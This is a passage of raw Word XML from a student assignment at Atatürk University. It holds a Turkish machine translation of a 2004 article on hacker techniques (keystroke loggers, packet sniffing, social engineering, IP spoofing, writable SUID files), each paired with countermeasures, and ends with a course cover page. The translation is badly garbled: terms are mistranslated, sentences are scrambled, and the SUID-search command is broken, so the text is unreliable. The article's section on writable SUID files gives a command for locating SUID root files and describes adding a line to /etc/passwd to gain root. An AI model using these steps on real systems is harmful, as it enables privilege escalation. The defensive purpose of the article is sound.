/</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asswd dosya.</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Tuş Günlüğü.</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 oturum açma oturumları yakalamak için kısa bir senaryo yazmak için en az 30 saniye sürer. B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bir iş istasyonunda bir tuş-günlük programını yüklemek için bir disketi kullana</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">bilir. Bu Truva atı kurulduktan </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sonra, bu tetikleyici anahtar kelimelere dayalı, arka planda çalışır ve her </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">oturum açma oturumunda yakalar. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hacker uzak bir yerden yakalanan tuş vuruşlarını okuma ve sisteme erişebili</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">r. Bu teknik çok basit ve hemen </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hemen her zaman farkedilme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r tuş-günlük programı yoluyla sisteme hacker'ın erişimini engellemek için ağ yöneticisi tem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yrıcalıklı hesabı (örneğin kök) bir kerelik şifreleri gerektir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v sahibi dosya sistemi ve bireysel kullanıcıların iş istasyonları periyodik tuş-günlüğü</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rogramlarını içerebilir Truva Atları tar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sayar donanımı için yeterli fiziksel erişim kısıtlamaları Truva Atları yüklenmesini kişi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ngellemek için var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Paket Sniffing.</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ternet ağ analizörleri ve dahil olmak üzere ağ izleme araçları geniş bir yelpazede sunuyor “pake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koklayıcıları.” Onlar bir iletişim segmenti boyunca iletilir olarak veri paketlerini </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">yakalayarak Bu araçlar işi. Bir </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hacker bu yazılım bir LAN ve yüklere bağlı bir PC'ye fiziksel erişim sağlayan so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nra, o da yerleri </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">arasında </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>transfer gibi verileri takip edebiliyor. Alternatif olarak, korsan ofis ve yakalam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">a veri paketleri halinde bir ağ </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bağlantı noktasına bir dizüstü ekleyebilirsini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u ağ trafiği genellikle şifreli değil hatırlamak, korsan özellikle arasındaki, geçerli bir kullanıc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esabı ve şifre kombinasyonları yakalamak dair yüksek şans</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2004 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simsiz FTP üzerinden serbestçe kullanılabilir ftp.ee.lbl.gov e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cpdump2.2.1.tar.z.</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aket izleyiciler aracılığıyla hesap ve şifre sızıntıları olasılığını azaltmak için, ağ yöneticis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berleşme hatları pratik olduğu kadar segmente edilmiş bulunmaktad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turum açma oturumları ve diğer hassas veriler Kerberos gibi yazılımları k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ullanılarak şifrelenmiş biçimde </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iletilmekte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yrıcalıklı hesabı (örneğin kök) bir kerelik şifreleri kullanarak işare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letişim hatları ve bilgisayar donanımı fiziksel erişim kısıtlan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Sosyal mühendisli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lar genellikle zaman (genellikle yaklaşık iki hafta) süreyle kullanılmamış bir kullanıcı hesab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ve yönetici sesle tanımak olası değildir bir kullanıcıya ait olduğundan emin olun. Bilgisayar korsan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genellikle başka bir binada devletlerarası kullanıcılara veya kullanıcılara ait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hesapları hedef alır. Onlar bir </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>seçtikten sonra, bir kullanıcının kimliğini üstlenecek ve onların şifrelerini u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nuttuysanız açıklayan, yönetici </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yardım masası arayın. Çoğu durumda, yönetici veya yardım masası telefonla hacker için şifreler sıfır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filtrasyon bu tür güvenli ağı tutmak için bir çaba, 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üm personel düzenli hatırlattı ve veri güvenliğinin önemi hakkında ve doğru şifre yönetim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onusunda eğitiml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rganizasyon belgelenmiş ve telefonla şifreleri sıfırlamak için prosedürleri kontrol ett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ersonel sosyal mühendislik saldırıları kurbanı yoktur. Personeli Bir hacker bilgi sistem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partmanı bir üyesi olarak kendisini yanlış ve şifre isteyebilir olasılığının farkında olmalı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Genel Erişim Yöntem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lar başka bir sistemden bir ana bilgisayar sistemine erişmek için çeşitli yöntemler kullanırla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Internet Protokol Adresi Sızdırm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ipik bir ağda, bir konak (Bir kullanıcı hesabı ve şifre kombinasyonunu gerektirmeden, yani) kimli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oğrulaması gerektirmeden onunla iletişim kurmak için diğer “güvenilir” ana sağlar. gibi dosy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">aları yapılandırarak </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>güvenilen olarak Sunucular tanımlanır. rhost v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osts.equiv Dosyalar. o iletişim bağlantıları kurmak için izin verilmeden önce kimlik doğrulaması sağ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">laması gerekir güvenilen olarak </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tanımlananlar dışındaki herhangi kon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ternet Protokolü (IP) sızdırma güvenilmeyen ana ağa bağlanma ve güvenilir bir ev sahibi gib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avranarak içerir. Bu erişim güvenilen konağın buna IP numarasını değiştirerek korsanı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ğlanır. Başka bir deyişle, izinsiz konak kimlik doğrulaması için zorlu değil, yerel ağdaki ana aptal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üvenlik bu tür ihlalleri önlemek için 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004 CRC Press LLC tarafından </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>içinde güvenilir olarak sadece uygun barındıran tanımlanmıştır / etc / hosts.equiv, ve bu dosyanın üzerine dosya izin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erl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dece uygun barındıran kullanıcıların / 'içinde tanımlanır. rhost Dosyalar. Pratik ise, bu dosyalar çıkarılmalı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Katılımsız Terminall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öyle öğle saatinde olarak uzun süre için açık ve sahipsiz imzalanan sol kullanıcı terminalleri bulm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ldukça yaygındır. Bilgisayar korsanı kullanıcıların çalışma alanlarına fiziksel eriş</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ebilir varsayarsak (veya korsan </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>içeriden olduğunu varsayarak), bu durum sistemin güvenliğini tehlikeye karşı bir hacker için mükemmel bir fırsat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yıkıcı bir virüs indirmek, bir Truva atı yerleştirin yetkisiz işlemleri gerçekleşt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">irmek için katılımsız terminali </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kullanmak kullanıcının değiştirebilir. rhost dosya veya korsan sonradan oturum böylece kullanıcının şifresini değiştir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 yöneticisi sağlayarak gözetimsiz terminalleri ile erişimden tehlikesini en aza indirmek iç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Kullanıcı oturumları otomatik hareketsizlik önceden belirlenen bir saatte </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">zaman aşımına uğrar veya parola </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>korumalı ekran koruyucular çağr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llanıcılar düzenli eğitimli ve onlar sahipsiz onların çalışma alanları bırakmak bekliyoruz zaman kend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turumlarını kapalı imzalama önemi hakkında hatırlatıl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Yeterli kontroller kullanıcıların çalışma alanlarında fiziksel erişimi yetkisiz kişilerin önlemek iç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var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Yazılabilir Seti Kullanıcı Kimliği Dosya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lastRenderedPageBreak/>
        <w:t>UNIX çalıştırılabilir dosyaları dosya izinleri ayarlamak kullanıcı kimliği (SUID) kök yaparak kök yetk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verilmek istenen verir. Hacker'lar genellikle tüm SUID dosyaları tespit etmek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve yazılabilir olup olmadığını </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>belirlemek için dosya sistemi üzerinden arama. yürütüldüğünde sonraki sefer, yazma, böylece onlar yazı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lmalı, korsan SUID programı dahilinde basit bir kod satırı ekleyebilirsiniz / etc / pa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sswd dosya ve bu root haklarını </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kazanmak için korsanı sağlayacaktır. Aşağıdaki UNIX komut tüm dosya sist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">em boyunca SUID kök dosyalarını </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>arayacaktır: / -Kullanıcı kök -perm -4000 -print bulm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 yöneticisi sağlayarak SUID dosyalar arasında yasadışı erişim imkanı azalt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programların en az sayıda SUID dosya izinlerini atan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UID olan programlar kök dışında kullanıcılar tarafından yazılabilir değil.</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 xml:space="preserve">onlar etkili SUID kök çünkü sistem cron tabloları (özellikle kök cron tablo) içinde </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tanımlanmış Çalıştırılabilirler </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kök dışında kullanıcılar tarafından yazılabilir değil.</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Bilgisayar Acil Müdahale Ekibi Danışmanla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sayar Acil Müdahale Ekibi (CERT) yeni bir güvenlik poz saptanmıştır zaman uyarı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veren. Bu riskler sıklıkla yetkisiz kullanıcıların sistemlerine kök erişmek için izin verir. Hackerlar h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zama</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">n en son CERT uyarılarına takip </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>© 2004 CRC Press LLC tarafında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üm CERT uyarılarının gözden geçirilerek bir kontrollü ve zamanında gereği yapılmıştı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Checksum'ları uygulama öncesinde CERT yamalar bütünlüğünü sağlamak için kullanıl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Hacker Bülten tahta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ternet sistem güvenliği değerli bir bilgi kaynağı olarak hareket korsan ilan panoları v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forumlarda çok sayıda vardır. En popüler korsan ilan tahtası “2600” tartışması grubudur. genellikl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eşitli sistemlere ilişkin Dünya değişimi güvenlik bilgisi yerinden ve Hackerlar belirli programlara ilişk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kuruluşlar veya korsan teknikleri ile ilgili güvenlik hassas bilgileri yayımlama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Ağ yöneticisi kurumun veri güvenlik görevlisi düzenli kuruluşun sistem ortamına ile ilgil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labilecek yeni teknikler ve bilgiler tespit etmek korsan bülten panoları gözden emin olmalıdı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İnternet Yazılım.</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İnternet, bilgisayar kaynakları güvence veri güvenliği görevlileri ve yöneticileri yardımcı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ATAN, POLİSLER ve ISS gibi yararlı araçlar, çok sayıda sunar. Bu araçlar güvenlik risklerini tespit</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tmek, kurumsal sistemlerini tarayın. Ancak, bu araçlar da korsanlara mevcu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ttur ve sistemleri nüfuz onlara </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yardımcı olabil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Olası güvenlik sorunlarını belirlemek ve gidermek için, ağ yöneticisi temin et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er güvenlik programının son sürümü elde edilmiş ve düzenli bir şekilde yürütülmektedir. He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espit poz derhal çözülmelidir.</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istem veri güvenlik görevlisi ve bağımsız dış danışmanları ikisi tarafından düzenli güvenli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enetimleri tabid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Sonuç</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Hacker aktivite işletmelerin internete kendi iç kurumsal ağlarını bağlamak artmaya devam edecek</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gerçek ve sürekli tehdit oluşturuyor. Bu makale, bilgisayar kaynaklarına erişmek için yetkisiz kişilerin</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en sık görülen korsan teknikleri anlatmıştır. kendini kesmek denetim algılanır ve zamanında</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çözülmediği takdirde, hackerlar kurumsal sistemine nüfuz edebilme izin verebilir, güvenlik zayıflıkları</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tanımlamak için giderek kritik bir teknik haline geliyor. Sistem yöneticileri ve veri güvenlik görevli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düzenli bütün CERT yayınları ve hacker bülten panoları okuyarak son korsan teknikleri takip etmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AA0047" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Yazar Biyografileri</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tephen James</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Stephen James UNIX ve İnternet güvenliği yanı sıra, hacker çalışmalarında uzmanlaşmış Avustralya'nın önde</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AA0047" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bilgisayar güvenlik uzmanları biridir. O Price Waterhouse (Sidney) ile üst düzey bir danışman.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AA0047" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>© 2004 CRC Press LLC tarafından</w:t>
      </w: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ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9549D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>T.C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9549D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ATATÜRK ÜNİVERSİTESİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9549D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MÜHENDİSLİK FAKÜLTESİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9549D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9549D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>BİLGİSAYAR MÜHENDİSLİĞİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49BFCE48" wp14:editId="5E597E31">
            <wp:extent cx="3909060" cy="390906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uniLogo.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3909600" cy="3909600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>BAHAR DÖNEMİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>BİLGİSAYAR-BİLGİ GÜVENLİĞİ ve YÖNETİMİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>BM-302-50-50</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB1796"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1.6.3-2.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9549D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9549D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Dorukhan AYDIN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9549D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>140757010</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jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>İÇİNDEKİLER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
